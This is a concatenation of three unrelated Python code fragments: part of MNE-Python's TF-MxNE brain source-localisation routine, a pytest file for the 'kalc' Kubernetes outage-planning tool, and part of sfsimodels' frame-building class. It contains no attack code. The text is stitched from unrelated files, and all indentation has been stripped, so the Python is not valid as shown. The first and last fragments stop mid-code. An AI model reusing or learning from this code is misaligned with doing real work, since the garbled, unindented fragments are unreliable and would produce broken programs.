X = _reapply_source_weighting(X, source_weighting, active_set)
outs = list()
residual = list()
cnt = 0
for e in evoked:
tmin = e.times[0]
tstep = 1.0 / e.info['sfreq']
Xe = X[:, cnt:(cnt + len(e.times))]
if return_as_dipoles:
out = _make_dipoles_sparse(
Xe, active_set, forward, tmin, tstep,
M[:, cnt:(cnt + len(e.times))],
M_estimated[:, cnt:(cnt + len(e.times))], verbose=None)
else:
out = _make_sparse_stc(Xe, active_set, forward, tmin, tstep)
outs.append(out)
cnt += len(e.times)
if return_residual:
residual.append(_compute_residual(forward, e, Xe, active_set,
gain_info))
logger.info('[done]')
if len(outs) == 1:
out = outs[0]
if return_residual:
residual = residual[0]
else:
out = outs
if return_residual:
out = out, residual
return out
def _window_evoked(evoked, size):
"""Window evoked (size in seconds)."""
if isinstance(size, (float, int)):
lsize = rsize = float(size)
else:
lsize, rsize = size
evoked = evoked.copy()
sfreq = float(evoked.info['sfreq'])
lsize = int(lsize * sfreq)
rsize = int(rsize * sfreq)
lhann = np.hanning(lsize * 2)[:lsize]
rhann = np.hanning(rsize * 2)[-rsize:]
window = np.r_[lhann, np.ones(len(evoked.times) - lsize - rsize), rhann]
evoked.data *= window[None, :]
return evoked
@verbose
def tf_mixed_norm(evoked, forward, noise_cov,
loose='auto', depth=0.8, maxit=3000,
tol=1e-4, weights=None, weights_min=0., pca=True,
debias=True, wsize=64, tstep=4, window=0.02,
return_residual=False, return_as_dipoles=False,
alpha=None, l1_ratio=None, dgap_freq=10, rank=None,
verbose=None):
"""Time-Frequency Mixed-norm estimate (TF-MxNE).
Compute L1/L2 + L1 mixed-norm solution on time-frequency
dictionary. Works with evoked data [1]_ [2]_.
Parameters
----------
evoked : instance of Evoked
Evoked data to invert.
forward : dict
Forward operator.
noise_cov : instance of Covariance
Noise covariance to compute whitener.
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
%(depth)s
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter.
weights: None | array | SourceEstimate
Weight for penalty in mixed_norm. Can be None or
1d array of length n_sources or a SourceEstimate e.g. obtained
with wMNE or dSPM or fMRI.
weights_min: float
Do not consider in the estimation sources for which weights
is less than weights_min.
pca: bool
If True the rank of the data is reduced to true dimension.
debias: bool
Remove coefficient amplitude bias due to L1 penalty.
wsize: int or array-like
Length of the STFT window in samples (must be a multiple of 4).
If an array is passed, multiple TF dictionaries are used (each having
its own wsize and tstep) and each entry of wsize must be a multiple
of 4. See [3]_.
tstep: int or array-like
Step between successive windows in samples (must be a multiple of 2,
a divider of wsize and smaller than wsize/2) (default: wsize/2).
If an array is passed, multiple TF dictionaries are used (each having
its own wsize and tstep), and each entry of tstep must be a multiple
of 2 and divide the corresponding entry of wsize. See [3]_.
window : float or (float, float)
Length of time window used to take care of edge artifacts in seconds.
It can be one float or float if the values are different for left
and right window length.
return_residual : bool
If True, the residual is returned as an Evoked instance.
return_as_dipoles : bool
If True, the sources are returned as a list of Dipole instances.
alpha : float in [0, 100) or None
Overall regularization parameter.
If alpha and l1_ratio are not None, alpha_space and alpha_time are
overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
* l1_ratio. 0 means no regularization, 100 would give 0 active dipole.
l1_ratio : float in [0, 1] or None
Proportion of temporal regularization.
If l1_ratio and alpha are not None, alpha_space and alpha_time are
overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
* l1_ratio. 0 means no time regularization aka MxNE.
dgap_freq : int or np.inf
The duality gap is evaluated every dgap_freq iterations.
%(rank_None)s
.. versionadded:: 0.18
%(verbose)s
Returns
-------
stc : instance of SourceEstimate
Source time courses.
residual : instance of Evoked
The residual a.k.a. data not explained by the sources.
Only returned if return_residual is True.
See Also
--------
mixed_norm
References
----------
.. [1] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
"Time-Frequency Mixed-Norm Estimates: Sparse M/EEG imaging with
non-stationary source activations",
Neuroimage, Volume 70, pp. 410-422, 15 April 2013.
DOI: 10.1016/j.neuroimage.2012.12.051
.. [2] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
"Functional Brain Imaging with M/EEG Using Structured Sparsity in
Time-Frequency Dictionaries",
Proceedings Information Processing in Medical Imaging
Lecture Notes in Computer Science, Volume 6801/2011, pp. 600-611, 2011.
DOI: 10.1007/978-3-642-22092-0_49
.. [3] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>.
"M/EEG source localization with multiscale time-frequency dictionaries",
6th International Workshop on Pattern Recognition in Neuroimaging
(PRNI), 2016.
DOI: 10.1109/PRNI.2016.7552337
"""
_check_reference(evoked)
all_ch_names = evoked.ch_names
info = evoked.info
if not (0. <= alpha < 100.):
raise ValueError('alpha must be in [0, 100). '
'Got alpha = %s' % alpha)
if not (0. <= l1_ratio <= 1.):
raise ValueError('l1_ratio must be in range [0, 1].'
' Got l1_ratio = %s' % l1_ratio)
alpha_space = alpha * (1. - l1_ratio)
alpha_time = alpha * l1_ratio
if dgap_freq <= 0.:
raise ValueError('dgap_freq must be a positive integer.'
' Got dgap_freq = %s' % dgap_freq)
tstep = np.atleast_1d(tstep)
wsize = np.atleast_1d(wsize)
if len(tstep) != len(wsize):
raise ValueError('The same number of window sizes and steps must be '
'passed. Got tstep = %s and wsize = %s' %
(tstep, wsize))
forward, gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked.info, noise_cov, pca, depth, loose, rank,
weights, weights_min)
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
if window is not None:
evoked = _window_evoked(evoked, window)
sel = [all_ch_names.index(name) for name in gain_info["ch_names"]]
M = evoked.data[sel]
# Whiten data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
# Scaling to make setting of alpha easy
n_steps = np.ceil(M.shape[1] / tstep.astype(float)).astype(int)
n_freqs = wsize // 2 + 1
n_coefs = n_steps * n_freqs
phi = _Phi(wsize, tstep, n_coefs)
alpha_max = norm_epsilon_inf(gain, M, phi, l1_ratio, n_dip_per_pos)
alpha_max *= 0.01
gain /= alpha_max
source_weighting /= alpha_max
X, active_set, E = tf_mixed_norm_solver(
M, gain, alpha_space, alpha_time, wsize=wsize, tstep=tstep,
maxit=maxit, tol=tol, verbose=verbose, n_orient=n_dip_per_pos,
dgap_freq=dgap_freq, debias=debias)
if active_set.sum() == 0:
raise Exception("No active dipoles found. "
"alpha_space/alpha_time are too big.")
# Compute estimated whitened sensor data
M_estimated = | |
<reponame>KellyGriffin/kalc
from tests.test_util import print_objects
from tests.libs_for_tests import prepare_yamllist_for_diff
from kalc.model.search import Check_services, Check_deployments, Check_daemonsets, OptimisticRun, CheckNodeOutage, Check_node_outage_and_service_restart
from kalc.model.system.Scheduler import Scheduler
from kalc.model.system.globals import GlobalVar
from kalc.model.kinds.Service import Service
from kalc.model.kinds.Node import Node
from kalc.model.kinds.Pod import Pod
from kalc.model.kinds.Deployment import Deployment
from kalc.model.kinds.DaemonSet import DaemonSet
from kalc.model.kinds.PriorityClass import PriorityClass
from kalc.model.kubernetes import KubernetesCluster
from kalc.misc.const import *
import pytest
import inspect
from kalc.model.search import K8ServiceInterruptSearch
from kalc.misc.object_factory import labelFactory
from click.testing import CliRunner
from kalc.model.scenario import Scenario
from poodle import planned
from tests.libs_for_tests import convert_space_to_yaml,print_objects_from_yaml,print_plan,load_yaml, print_objects_compare, checks_assert_conditions, reload_cluster_from_yaml, checks_assert_conditions_in_one_mode
DEBUG_MODE = 2 # 0 - no debug, 1- debug with yaml load , 2 - debug without yaml load
def build_running_pod(podName, cpuRequest, memRequest, atNode):
pod_running_1 = Pod()
pod_running_1.metadata_name = "pod"+str(podName)
pod_running_1.cpuRequest = cpuRequest
pod_running_1.memRequest = memRequest
pod_running_1.atNode = atNode
pod_running_1.status = STATUS_POD["Running"]
pod_running_1.hasDeployment = False
pod_running_1.hasService = False
pod_running_1.hasDaemonset = False
return pod_running_1
def build_running_pod_with_d(podName, cpuRequest, memRequest, atNode, d, ds):
pod_running_1 = Pod()
pod_running_1.metadata_name = "pod"+str(podName)
pod_running_1.cpuRequest = cpuRequest
pod_running_1.memRequest = memRequest
pod_running_1.atNode = atNode
pod_running_1.status = STATUS_POD["Running"]
pod_running_1.hasDeployment = False
pod_running_1.hasService = False
pod_running_1.hasDaemonset = False
if d is not None:
d.podList.add(pod_running_1)
d.amountOfActivePods += 1
pod_running_1.hasDeployment = True
if ds is not None:
ds.podList.add(pod_running_1)
ds.amountOfActivePods += 1
pod_running_1.hasDaemonset = True
atNode.currentFormalCpuConsumption += cpuRequest
atNode.currentFormalMemConsumption += memRequest
return pod_running_1
def build_pending_pod(podName, cpuRequest, memRequest, toNode):
p = build_running_pod(podName, cpuRequest, memRequest, Node.NODE_NULL)
p.status = STATUS_POD["Pending"]
p.toNode = toNode
p.hasDeployment = False
p.hasService = False
p.hasDaemonset = False
return p
def build_pending_pod_with_d(podName, cpuRequest, memRequest, toNode, d, ds):
p = Pod()
p.metadata_name = "pod"+str(podName)
p.cpuRequest = cpuRequest
p.memRequest = memRequest
p.status = STATUS_POD["Pending"]
p.hasDeployment = False
p.hasService = False
p.hasDaemonset = False
if d is not None:
d.podList.add(p)
p.hasDeployment = True
if ds is not None:
ds.podList.add(p)
p.hasDaemonset = True
p.toNode = toNode
return p
def prepare_test_29_many_pods_not_enough_capacity_for_service(nodes_amount,node_capacity,pod2_amount,pod0_amount,pod2_2_amount,pod3_amount):
# Initialize scheduler, globalvar
k = KubernetesCluster()
scheduler = next(filter(lambda x: isinstance(x, Scheduler), k.state_objects))
# initial node state
i = 0
j = 0
nodes = []
pods = []
# Service to detecte eviction
s = Service()
s.metadata_name = "test-service"
s.amountOfActivePods = 0
s2 = Service()
s2.metadata_name = "test-service2"
s2.amountOfActivePods = 0
# create Deploymnent that we're going to detect failure of...
d = Deployment()
d.spec_replicas = 2
pod_id = 1
for i in range(nodes_amount):
node_item = Node("node"+str(i))
node_item.cpuCapacity = node_capacity
node_item.memCapacity = node_capacity
node_item.isNull = False
node_item.status = STATUS_NODE["Active"]
nodes.append(node_item)
for j in range(pod2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod0_amount):
pod_running_0 = build_running_pod_with_d(pod_id,0,0,node_item,None,None)
pod_id += 1
pods.append(pod_running_0)
node_item.amountOfActivePods += 1
for j in range(pod2_2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod3_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,nodes[0],None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s2.podList.add(pod_running_2)
s2.amountOfActivePods +=1
# priority for pod-to-evict
pc = PriorityClass()
pc.priority = 10
pc.metadata_name = "high-prio-test"
k.state_objects.extend(nodes)
k.state_objects.extend(pods)
k.state_objects.extend([pc, s, s2 ])
create_objects = []
k2 = reload_cluster_from_yaml(k,create_objects)
k._build_state()
class NewGoal_k1(CheckNodeOutage):
pass
p = NewGoal_k1(k.state_objects)
class NewGoal_k2(CheckNodeOutage):
pass
p2 = NewGoal_k2(k2.state_objects)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
return k, k2, p , p2
def prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(nodes_amount,node_capacity,pod2_amount,pod0_amount,pod2_2_amount,pod3_amount):
# Initialize scheduler, globalvar
k = KubernetesCluster()
scheduler = next(filter(lambda x: isinstance(x, Scheduler), k.state_objects))
# initial node state
i = 0
j = 0
nodes = []
pods = []
# Service to detecte eviction
s = Service()
s.metadata_name = "test-service"
s.amountOfActivePods = 0
s2 = Service()
s2.metadata_name = "test-service2"
s2.amountOfActivePods = 0
# create Deploymnent that we're going to detect failure of...
d = Deployment()
d.spec_replicas = 2
pod_id = 1
for i in range(nodes_amount):
node_item = Node("node"+str(i))
node_item.cpuCapacity = node_capacity
node_item.memCapacity = node_capacity
node_item.isNull = False
node_item.status = STATUS_NODE["Active"]
nodes.append(node_item)
for j in range(pod2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod0_amount):
pod_running_0 = build_running_pod_with_d(pod_id,0,0,node_item,None,None)
pod_id += 1
pods.append(pod_running_0)
node_item.amountOfActivePods += 1
for j in range(pod2_2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod3_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,nodes[0],None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s2.podList.add(pod_running_2)
s2.amountOfActivePods +=1
# priority for pod-to-evict
pc = PriorityClass()
pc.priority = 10
pc.metadata_name = "high-prio-test"
k.state_objects.extend(nodes)
k.state_objects.extend(pods)
k.state_objects.extend([pc, s, s2 ])
create_objects = []
k._build_state()
class NewGoal_k1(CheckNodeOutage):
pass
p = NewGoal_k1(k.state_objects)
NewGoal_k1.__name__ = inspect.stack()[0].function
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
print_objects(k.state_objects)
return k, p
def test_29():
k, k2, p, p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,15,1,1,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_30():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,19,2,2,1,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_31():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,23,3,3,1,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_32():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,26,3,3,2,2)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_33():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,32,4,4,4,4)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_34():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,40,5,5,5,5)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_36():
k, k2, p, p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,8,1,1,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_37():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,8,2,2,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_38():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,8,3,3,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_39():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,4,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_40():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,25,5,5,5,5)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,DEBUG_MODE)
def test_41():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,11,4,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_42():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,5,5,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_43():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,5,5,5,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_44():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,5,5,5,5)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_45():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,4,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_46():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,16,5,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_47():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,20,5,5,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_48():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,24,5,5,5,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_49():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(1,10,5,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_50_7pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,15,3,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_51_11pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,19,5,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_52_14pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,23,7,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_53_17pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,26,8,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_54_25pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,32,12,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_55_31pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,40,15,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_56_7pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,20,3,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_57_11pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,25,5,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_58_15pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,30,7,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_59_25pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,30,12,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_60_31pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,35,15,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test",DEBUG_MODE)
def test_61_28pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,40,12,0,0,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_62_32pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,40,14,0,0,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", | |
def _assign_loaded_columns(self):
for ss in range(self.n_storeys):
for bb in range(self.n_bays):
sect_is = self._loaded_column_section_ids[ss][bb]
if hasattr(sect_is, "__len__"):
n_sections = len(sect_is)
self.columns[ss][bb].split_into_multiple([1] * n_sections) # TODO: should be lengths
for sect_i in range(len(sect_is)):
column_sect_id = str(self._loaded_column_section_ids[ss][bb][sect_i])
sect_dictionary = self._loaded_column_sections[column_sect_id]
sf.add_to_obj(self.columns[ss][bb].sections[sect_i], sect_dictionary)
else: # deprecated loading
deprecation("Frame data structure is out-of-date, "
"run sfsimodels.migrate_ecp(<file-path>, <out-file-path>).")
column_sect_id = str(self._loaded_column_section_ids[ss][bb])
sect_dictionary = self._loaded_column_sections[column_sect_id]
sf.add_to_obj(self.columns[ss][bb].sections[0], sect_dictionary)
def set_beam_prop(self, prop, values, repeat="up", sections=None):
"""
Specify the properties of the beam
Parameters
----------
prop: str
Name of property that values should be assigned to
values: value or array_like
Value or list of values to be assigned
repeat: str
If 'up' then duplicate up the structure, if 'all' the duplicate for all columns
"""
si = 0
if sections is not None:
si = 1
values = np.array(values)
if repeat == "up":
assert len(values.shape) == 1 + si
values = [values for ss in range(self.n_storeys)]
elif repeat == "all":
assert len(values.shape) == 0 + si
values = [[values for i in range(self.n_bays)] for ss in range(self.n_storeys)]
else:
assert len(values.shape) == 2 + si
if len(values[0]) != self.n_bays:
raise ModelError("beam depths does not match number of bays (%i)." % self.n_bays)
for ss in range(self.n_storeys):
for i in range(self.n_bays):
self._beams[ss][i].set_section_prop(prop, values[ss][i], sections=sections)
def set_column_prop(self, prop, values, repeat="up", sections=None):
"""
Specify the properties of the columns
Parameters
----------
prop: str
Name of property that values should be assigned to
values: value or array_like
Value or list of values to be assigned
repeat: str
If 'up' then duplicate up the structure, if 'all' the duplicate for all columns
"""
si = 0
if sections is not None:
si = 1
values = np.array(values)
if repeat == "up":
assert len(values.shape) == 1 + si
values = [values for ss in range(self.n_storeys)]
elif repeat == 'all':
assert len(values.shape) == 0 + si
values = [[values for i in range(self.n_cols)] for ss in range(self.n_storeys)]
else:
assert len(values.shape) == 2 + si
if len(values[0]) != self.n_cols:
raise ModelError("column props does not match n_cols (%i)." % self.n_cols)
for ss in range(self.n_storeys):
for i in range(self.n_cols):
self._columns[ss][i].set_section_prop(prop, values[ss][i], sections=sections)
def beams_at_storey(self, storey):
"""Get the beams at a particular storey"""
return self._beams[storey - 1]
def get_beams_at_storey(self, storey):
"""Get the beams at a particular storey"""
return self._beams[storey - 1]
@property
def beam_depths(self):
"""Get a 2D array of beam depths, first index is storey"""
beam_depths = []
for ss in range(self.n_storeys):
beam_depths.append([])
for i in range(self.n_bays):
beam_depths[ss].append(self.beams[ss][i].get_section_prop("depth"))
return np.array(beam_depths)
@property
def beam_widths(self):
"""Get a 2D array of beam widths, first index is storey"""
beam_widths = []
for ss in range(self.n_storeys):
beam_widths.append([])
for i in range(self.n_bays):
beam_widths[ss].append(self.beams[ss][i].get_section_prop("width"))
return np.array(beam_widths)
@property
def column_depths(self):
"""Get a 2D array of column depths, first index is storey"""
column_depths = []
for ss in range(self.n_storeys):
column_depths.append([])
for i in range(self.n_cols):
column_depths[ss].append(self.columns[ss][i].get_section_prop("depth"))
return np.array(column_depths)
@property
def column_widths(self):
"""Get a 2D array of column widths, first index is storey"""
column_widths = []
for ss in range(self.n_storeys):
column_widths.append([])
for i in range(self.n_cols):
column_widths[ss].append(self.columns[ss][i].get_section_prop("width"))
return np.array(column_widths)
@property
def bay_lengths(self):
return self._bay_lengths
@bay_lengths.setter
def bay_lengths(self, bay_lengths):
if len(bay_lengths) != self.n_bays:
raise ModelError("bay_lengths does not match number of bays (%i)." % self.n_bays)
self._bay_lengths = np.array(bay_lengths)
def get_column_positions(self): # could override in frame building if floor length is longer than bay lengths
return np.cumsum(np.pad(self.bay_lengths, (1, 0), "constant")) - np.sum(self.bay_lengths) / 2
class FrameBuilding(Frame, Building):
_n_seismic_frames = None
_n_gravity_frames = None
type = "frame_building"
def __init__(self, n_storeys, n_bays):
"""
A building that has frames aligned along the length axis
:param n_storeys:
:param n_bays:
"""
Frame.__init__(self, n_storeys, n_bays)
Building.__init__(self, n_storeys)
# super(BuildingFrame, self).__init__(n_storeys, n_bays) # run parent class initialiser function
self._extra_class_inputs = ["n_seismic_frames",
"n_gravity_frames",
"horz2vert_mass"]
self.inputs = self.inputs + self._extra_class_inputs
self.horz2vert_mass = 1.0
self.x_offset = 0.0 # distance between centre of frame and centre of floor
# Frame.__init__(self, n_storeys, n_bays)
# Building.__init__(self, n_storeys, n_bays)
@property
def ancestor_types(self):
"""List of ancestors class types"""
return super(FrameBuilding, self).ancestor_types + ["frame_building"]
@property
def n_seismic_frames(self):
"""Number of seismically resisting frames"""
